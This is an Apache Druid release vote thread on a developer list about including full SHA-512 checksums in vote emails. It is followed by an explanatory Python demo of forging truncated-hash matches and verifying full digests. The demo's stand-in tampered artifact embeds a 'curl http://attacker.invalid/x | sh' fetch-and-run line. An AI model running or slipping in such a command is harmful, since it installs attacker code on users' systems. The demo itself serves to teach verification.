Full checksum. An attacker can easily generate a binary that matches a given 32-bit (8 digit) hash. That’s why we use SHA-256 or SHA-512.

If it helps, here is a typical Calcite vote email:

http://mail-archives.apache.org/mod_mbox/calcite-dev/201906.mbox/%3cCA+EpF8vwOceAeUjv+DJU=zqrkoqu3dwckwsypqhrj6crw9e...@mail.gmail.com%3e
 




> On Sep 16, 2019, at 1:43 AM, Clint Wylie <cwy...@apache.org> wrote:
> 
> Ah, oops, yes indeed they are reversed, my bad! I certainly agree with all
> your points on why it is a good idea, and will update our template after
> the release to make sure we do it in the future. Is it better practice to
> include the full checksum, or would truncated to the first 8 or so
> characters be preferable to play nice with email?
> 
> On Sun, Sep 15, 2019 at 8:34 PM Julian Hyde <jh...@apache.org> wrote:
> 
>> Sorry for my rather terse -1 vote. I had assumed that we had been
>> following the policy for a while, so when I noticed that we were not I
>> assumed it was a mistake by the release manager.
>> 
>> Actually I am not sure whether it is policy, but there's definitely a
>> strong case for including hashes. The point is this: we are voting on
>> artifacts, principally apache-druid-0.16.0-incubating-src.tar.gz.
>> 
>> Suppose we all vote on the current
>> apache-druid-0.16.0-incubating-src.tar.gz, the vote passes, and then
>> someone replaces it with a similar file that contains some bad stuff.
>> How are we to know whether that is the file we voted on?
>> 
>> Putting the file hash in the vote email guarantees that we are all
>> voting on the same set of artifacts, and that set of artifacts is
>> recorded.
>> 
>> I think you reversed the hashes (I got 0c4b71f0 for bin, 1f25c55e for
>> src), but that's close enough, so let's proceed.
>> 
>> 
>> +1 (binding)
>> 
>> Checked hashes, LICENSE, NOTICE, DISCLAIMER; ran RAT; compiled
>> (skipping tests) using JDK 8 on Ubuntu. Checked that src.tar.gz
>> matches git commit.
>> 
>> Julian
>> 
>> 
>> On Sun, Sep 15, 2019 at 7:24 PM Clint Wylie <cwy...@apache.org> wrote:
>>> 
>>>> The vote email must contain the checksums of the artifacts we are
>>>> voting on.
>>> 
>>> Apologies, I wasn't aware of this requirement since we haven't put them
>>> in our prior incubating release vote threads and I was just copying the
>>> same basic template I and others have previously used. Out of curiosity,
>>> is this a new-ish requirement that I missed, or one we just didn't notice
>>> or have just been turning a blind eye to? Regardless, since we are now
>>> maintaining a 'how to ASF release' guide in the github repo that includes
>>> templates for voting threads,
>>> https://github.com/apache/incubator-druid/blob/master/distribution/asf-release-process-guide.md#body
>>> , I'll be sure to update it, thanks!
>>> 
>>>> No need for a new RC; I change my vote if the release manager sends an
>>>> email with the checksums.
>>> 
>>> If this thread is ok, here they are:
>>> 
>>> artifact checksums
>>> src:
>>> 0c4b71f077e28d2f4d3bc3f072543374570b98ec6a1918a5e1828e1da7e3871b5efb04070a8bcdbc172a817e43254640ce28a99757984be7d8dd3d607f1d870e
>>> bin:
>>> 1f25c55e83069cf7071a97c1e0d56732437dbac4ef373ed1ed72b5b618021b74c107269642226e80081354c8da2e92dc26f1541b01072a4720fd6cfe8dc161a8
>>> docker: df9b900d3726ce123a5c054768da1ea08eba6efe635ced5abc3ad72d6c835e2c
>>> 
>>> Thanks!
>>> Clint
>>> 
>>> On Sun, Sep 15, 2019 at 6:22 PM Julian Hyde <jh...@apache.org> wrote:
>>> 
>>>> -1
>>>> 
>>>> The vote email must contain the checksums of the artifacts we are
>>>> voting on.
>>>> 
>>>> No need for a new RC; I change my vote if the release manager sends an
>>>> email with the checksums.
>>>> 
>>>> Julian
>>>> 
>>>> On Fri, Sep 13, 2019 at 11:57 PM Clint Wylie <cwy...@apache.org> wrote:
>>>>> 
>>>>> Hi all,
>>>>> 
>>>>> I have created a build for Apache Druid (incubating) 0.16.0, release
>>>>> candidate 3.
>>>>> 
>>>>> Thanks to everyone who has helped contribute to the release! You can
>>>>> read the proposed release notes here:
>>>>> https://github.com/apache/incubator-druid/issues/8369
>>>>> 
>>>>> The release candidate has been tagged in GitHub as
>>>>> druid-0.16.0-incubating-rc3 (54d29e438a4df34d75e2385af6cefd1092c4ebb3),
>>>>> available here:
>>>>> https://github.com/apache/incubator-druid/releases/tag/druid-0.16.0-incubating-rc3
>>>>> 
>>>>> The artifacts to be voted on are located here:
>>>>> https://dist.apache.org/repos/dist/dev/incubator/druid/0.16.0-incubating-rc3/
>>>>> 
>>>>> Staged druid.apache.org website documentation is available here:
>>>>> https://druid.staged.apache.org/docs/0.16.0-incubating/design/index.html
>>>>> 
>>>>> A Docker image containing the binary of the release candidate can be
>>>>> retrieved via:
>>>>> docker pull apache/incubator-druid:0.16.0-incubating-rc3
>>>>> 
>>>>> Release artifacts are signed with the following key:
>>>>> https://people.apache.org/keys/committer/cwylie.asc
>>>>> 
>>>>> This key and the key of other committers can also be found in the
>>>>> project's KEYS file here:
>>>>> https://dist.apache.org/repos/dist/release/incubator/druid/KEYS
>>>>> 
>>>>> (If you are a committer, please feel free to add your own key to that
>>>>> file by following the instructions in the file's header.)
>>>>> 
>>>>> Verify checksums:
>>>>> diff <(shasum -a512 apache-druid-0.16.0-incubating-src.tar.gz | \
>>>>> cut -d ' ' -f1) \
>>>>> <(cat apache-druid-0.16.0-incubating-src.tar.gz.sha512 ; echo)
>>>>> 
>>>>> diff <(shasum -a512 apache-druid-0.16.0-incubating-bin.tar.gz | \
>>>>> cut -d ' ' -f1) \
>>>>> <(cat apache-druid-0.16.0-incubating-bin.tar.gz.sha512 ; echo)
>>>>> 
>>>>> Verify signatures:
>>>>> gpg --verify apache-druid-0.16.0-incubating-src.tar.gz.asc \
>>>>> apache-druid-0.16.0-incubating-src.tar.gz
>>>>> 
>>>>> gpg --verify apache-druid-0.16.0-incubating-bin.tar.gz.asc \
>>>>> apache-druid-0.16.0-incubating-bin.tar.gz
>>>>> 
>>>>> Please review the proposed artifacts and vote. Note that Apache has
>>>>> specific requirements that must be met before +1 binding votes can be
>>>>> cast by PMC members. Please refer to the policy at
>>>>> http://www.apache.org/legal/release-policy.html#policy for more
>>>>> details.
>>>>> 
>>>>> As part of the validation process, the release artifacts can be
>>>>> generated from source by running:
>>>>> mvn clean install -Papache-release,dist -Dgpg.skip
>>>>> 
>>>>> The RAT license check can be run from source by:
>>>>> mvn apache-rat:check -Prat
>>>>> 
>>>>> This vote will be open for at least 72 hours. The vote will pass if a
>>>>> majority of at least three +1 PMC votes are cast.
>>>>> 
>>>>> Once the vote has passed, the second stage vote will be called on the
>>>>> Apache Incubator mailing list to get approval from the Incubator PMC.
>>>>> 
>>>>> [ ] +1 Release this package as Apache Druid (incubating) 0.16.0
>>>>> [ ] 0 I don't feel strongly about it, but I'm okay with the release
>>>>> [ ] -1 Do not release this package because...
>>>>> 
>>>>> Thanks!
>>>>> 
>>>>> Apache Druid (incubating) is an effort undergoing incubation at The
>>>>> Apache Software Foundation (ASF), sponsored by the Apache Incubator.
>>>>> Incubation is required of all newly accepted projects until a further
>>>>> review indicates that the infrastructure, communications, and decision
>>>>> making process have stabilized in a manner consistent with other
>>>>> successful ASF projects. While incubation status is not necessarily a
>>>>> reflection of the completeness or stability of the code, it does
>>>>> indicate that the project has yet to be fully endorsed by the ASF.
>>>> 
>>>> ---------------------------------------------------------------------
>>>> To unsubscribe, e-mail: dev-unsubscr...@druid.apache.org
>>>> For additional commands, e-mail: dev-h...@druid.apache.org
>>>> 
>>>> 
>> 
>> 
>> 
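
The two points argued in this thread, as an added, runnable illustration (this is not code from the Druid or Calcite projects, and the "artifact" bytes, file names and checksum texts in it are constructed stand-ins, not the real 0.16.0 tarballs): the reply at the top says a truncated 8-hex-digit hash is forgeable, and the vote template above checks a .sha512 file with `diff <(shasum ... | cut -d ' ' -f1) <(cat file.sha512; echo)`, which only works when the .sha512 file holds a bare digest. The block below brute-forces a tampered payload whose SHA-512 shares a short prefix with the genuine one (the prefix length is a parameter; 4 hex digits keeps it quick, and `expected_trials` gives the cost for the 8-digit case), shows that comparing the full digest still rejects it, and parses the checksum-file formats one actually meets in the wild (bare digest, `sha512sum`-style "digest  filename", and `gpg --print-md`-style groups of four hex digits) so the comparison does not fail on a format difference. The algorithm parameter also covers the SHA-256 Docker digest posted in the thread.

```python
"""Added example, not project code: why a vote e-mail should carry the full
digest rather than an 8-hex-digit prefix, and how to check an artifact against
its checksum file. All inputs are constructed so this runs offline."""
import hashlib
import hmac
import itertools
import re

# Constructed stand-ins: a "source tarball" and a tampered copy of it.
GENUINE_ARTIFACT = b"\x1f\x8b constructed stand-in for apache-druid-src.tar.gz\n"
MALICIOUS_PAYLOAD = GENUINE_ARTIFACT + b"curl http://attacker.invalid/x | sh\n"


def hex_len(algo: str) -> int:
    """Number of hex digits in a digest of the given hashlib algorithm."""
    return hashlib.new(algo).digest_size * 2


def digest_hex(data: bytes, algo: str = "sha512") -> str:
    return hashlib.new(algo, data).hexdigest()


def sha512sum_text(data: bytes, filename: str) -> str:
    """The "<digest>  <filename>\\n" line that sha512sum / shasum print."""
    return f"{digest_hex(data)}  {filename}\n"


def parse_checksum_file(text: str, algo: str = "sha512") -> str:
    """Extract the digest from a .sha512 / .sha256 file, tolerating the
    formats one actually meets: a bare digest with or without a trailing
    newline (what the e-mail's diff/cat/echo recipe assumes), the sha512sum
    form "<digest>  <filename>", and gpg --print-md style groups of four
    upper-case hex digits wrapped over several lines."""
    want = hex_len(algo)
    tokens = text.split()
    for tok in tokens:  # bare digest or sha512sum form
        if len(tok) == want and re.fullmatch(r"[0-9a-fA-F]+", tok):
            return tok.lower()
    grouped = "".join(t for t in tokens if re.fullmatch(r"[0-9a-fA-F]{4}", t))
    if len(grouped) == want:  # gpg --print-md form
        return grouped.lower()
    raise ValueError(f"no {algo} digest found in checksum file")


def verify_checksum(artifact: bytes, checksum_text: str, algo: str = "sha512") -> bool:
    """True only if the FULL digest of artifact equals the one in the file.
    compare_digest avoids leaking where the two strings first differ."""
    expected = parse_checksum_file(checksum_text, algo)
    return hmac.compare_digest(digest_hex(artifact, algo), expected)


def expected_trials(hex_digits: int) -> int:
    """Average brute-force cost of matching a hex prefix of any good hash:
    each hex digit is 4 bits, so an 8-digit prefix costs about 2**32 hashes."""
    return 16 ** hex_digits


def forge_prefix_match(payload: bytes, target_prefix: str, algo: str = "sha512",
                       max_trials: int = 1 << 24):
    """Append a harmless-looking trailer to payload until its digest starts
    with target_prefix. The trailer changes nothing the payload does, so the
    attacker keeps the malicious content and gains the matching prefix.
    Returns (forged_bytes, trials_used); raises if max_trials is exceeded."""
    target_prefix = target_prefix.lower()
    for n in itertools.count(1):
        candidate = payload + b"# build-id %d\n" % n
        if digest_hex(candidate, algo).startswith(target_prefix):
            return candidate, n
        if n >= max_trials:
            raise RuntimeError("prefix too long to brute-force here")


def demo(prefix_digits: int = 4) -> dict:
    """Forge a prefix match against the genuine digest and compare outcomes."""
    genuine_digest = digest_hex(GENUINE_ARTIFACT)
    prefix = genuine_digest[:prefix_digits]
    forged, trials = forge_prefix_match(MALICIOUS_PAYLOAD, prefix)
    return {
        "truncated_match": digest_hex(forged).startswith(prefix),
        "full_match": verify_checksum(forged, genuine_digest),
        "trials": trials,
        "work_for_8_digits": expected_trials(8),
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats that belong with this: a digest served next to the artifact only proves the download was intact, so it is the copy of the full digest in the archived vote e-mail that pins what was voted on; and neither this block nor a checksum replaces `gpg --verify` against the KEYS file, which is what ties the artifact to a committer's key rather than to whoever last wrote to the dist directory.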
